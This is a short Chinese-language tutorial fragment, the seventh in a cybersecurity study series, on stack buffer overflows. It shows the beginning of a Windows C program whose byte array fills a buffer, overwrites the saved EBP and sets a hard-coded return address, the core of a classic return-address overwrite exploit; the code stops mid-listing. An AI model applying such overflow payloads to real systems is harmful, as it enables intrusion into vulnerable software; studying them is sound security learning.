网络安全学习第7篇 - 缓冲区溢出

代码:   #include "windows.h" #include "stdio.h" #include "string.h" char name[] = "\x41\x41\x41\x41\x41\x41\x41\x41"  // name[0]~name[7]   "\x41\x41\x41\x41"                  // EBP   "\x79\x5b\xe3\x77"
相关文章
相关标签/搜索